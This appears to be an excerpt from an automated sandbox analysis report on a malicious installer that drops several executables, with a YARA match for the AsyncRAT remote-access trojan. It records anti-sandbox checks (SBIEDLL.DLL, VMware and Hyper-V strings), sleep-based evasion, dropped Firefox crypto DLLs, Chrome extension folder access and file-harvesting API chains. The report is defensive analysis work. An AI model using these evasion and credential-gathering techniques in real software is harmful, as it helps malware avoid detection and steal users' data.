Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: SETUP_~1.EXE PID: 7812, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: SETUP_~1.EXE, 00000028.00000002.873395936.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000028.00000002.872396022.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Program Files (x86)\Company\NewProduct\real.exe TID: 8956	Thread sleep count: 146 > 30
Source: C:\Program Files (x86)\Company\NewProduct\real.exe TID: 8956	Thread sleep time: -146000s >= -30000s
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe TID: 1944	Thread sleep count: 37 > 30
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe TID: 1944	Thread sleep time: -185000s >= -30000s
Source: C:\Program Files (x86)\Company\NewProduct\WW1.exe TID: 7016	Thread sleep count: 36 > 30
Source: C:\Program Files (x86)\Company\NewProduct\WW1.exe TID: 7016	Thread sleep time: -180000s >= -30000s

Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Company\NewProduct\WW1.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Company\NewProduct\WW1.exe	Last function: Thread delayed

Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Window / User API: threadDelayed 469
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1898

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_20-23539

Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe

API coverage: 1.2 %

Source: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe	Dropped PE file which has not been started: C:\Users\user\TypeRes\DllResource.exe	Jump to dropped file
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dll	Jump to dropped file
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dll	Jump to dropped file

Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Registry key enumerated: More than 174 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

20_2_0040ABD8

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	API call chain: ExitProcess graph end node	graph_20-23041
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	API call chain: ExitProcess graph end node	graph_23-8083
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	API call chain: ExitProcess graph end node	graph_23-8086
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	API call chain: ExitProcess graph end node	graph_23-8050

Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Source: ffnameedit.exe, 00000024.00000002.830735762.000000000099B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
Source: SETUP_~1.EXE, 00000028.00000002.872396022.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: ffnameedit.exe, 00000024.00000002.865709349.000000000262A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: zY617Pdb99+1WvhcD7lo3FrSKwd1Cywd9LMVGmivfhxbGU1DY8x/52zJ+c5pbJNXY0S4sBVdcTu5rKMgFogiqY6ISARX9l0yYlvGnbncaCtzr/0KVM7X9EJNQLEjjeZR2Vb0ytK0gg2tqs+dmyVc5c0X1qCQmPhKEyLEKk0YBV9pIjjEUA53pQGfnnX09MwvgJ4e6CWbxptV1ZgyjYpiWdgKTkH2TdVeQqM4L8IoRtIjkUbhfOeUN+xV3hYhKvrikbZ3Bf2FyyFRKpLoBrLTpcVoJjGKabpfOB86RFe6KtLroDs03pzDlurQGdVCjU/W5TnlqFxWtHNsd4I6NeFxcZ2acDGnUxNBw3VqonnECB6qq0xLVx96B+jq3b1k23jTNg6qFqphvIIqVsuqBtqdNjQNer2RDdGINBptc/R79wobkgS+woYIsQobRsFX2AgOMZSDdr7HsPM9KuVa7dr9n4T6+kgvuRxRs6qmjZc1mqUZu1ldAq29oIdczJR1VG6CA+2vStvIRpmJlRYVMGW7BGor1QGuCL3ZtLSVXK4wBUPPtCRXqyakQ7GEVbOyZinSZrLO/b0hL2FhW6yHsgVbDyc1TsxcmjzVN1SuVX3DiTzVN5JJjGKimpVQs/l0gWn2jk+//+7Vpz/9vu81hXe61VsxDcuanDXluoK1eIj0M6PqNG/l8oYQAIr7W8tw8WFy2Q2s98fJCyHy15CtPtVyEqCKDakQ8LVkm1+dPrQYjKYqLNCRYW6kZZwf/hFU7mf0kcE2xDEkaEThL2VGXlDg13oDa3eaXOjYJ7SC5bLYHVMcIZe2lNNuPmMBIaoWEBFCd8Rvkb1+vYYIg5LEVHfKaXJlgLYjOMWunOjRO6PzkXTHo0M3+H29ZGeLYAKknU40HYOYSxMw6DyhT9bZSP1qX5NR3h0TXfwdMuxTVSQC8rY7FZP8FrLfr7Su7GI89ulB7BClaQM7Bg1sqt2NHGHdSOFrfSTb4dItFQZzN8qmSpsSFyUkcqpm6MrxZr2s0LmZ
Source: real.exe, 0000001D.00000002.815261595.000000000129C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SETUP_~1.EXE, 00000028.00000002.872396022.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: real.exe, 0000001D.00000002.803649116.000000000121A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWpn*
Source: ordo_sec666.exe, 00000023.00000002.814423633.0000000000829000.00000004.00000020.00020000.00000000.sdmp, SETUP_~1.EXE, 00000028.00000002.817604217.0000000000D40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Program Files (x86)\Company\NewProduct\real.exe

Process information queried: ProcessInformation

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

Code function: 20_2_004092CF LocalAlloc,LocalAlloc,LocalAlloc,lstrlen,lstrcpyn,lstrcpyn,lstrlen,lstrcpyn,lstrcpyn,lstrlen,lstrcpyn,lstrcpyn,GetSystemInfo,wsprintfW,LocalFree,LocalFree,LocalFree,LocalFree,

20_2_004092CF

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_004052DA LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,	20_2_004052DA
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_00405B5B LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,FindClose,	20_2_00405B5B
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_0040196E FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW,	20_2_0040196E
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_0040B177 LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,DeleteFileW,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,FindNextFileW,LocalFree,FindClose,	20_2_0040B177
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_00401B05 FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindNextFileW,FindClose,	20_2_00401B05
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_0040AE06 LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,LocalFree,FindClose,	20_2_0040AE06
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_00403C8F StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	20_2_00403C8F
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_00401E18 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,StrCpyW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,wsprintfW,PathCombineW,FindFirstFileW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	20_2_00401E18
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_0040633E FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,lstrlenW,	20_2_0040633E
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_004039D7 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,	20_2_004039D7
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_00406725 LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,	20_2_00406725
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_004039D7 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,	23_2_004039D7
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_004052DA LocalAlloc,StrCpyW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,	23_2_004052DA
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_00405B5B LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,	23_2_00405B5B
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_0040196E FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW,	23_2_0040196E
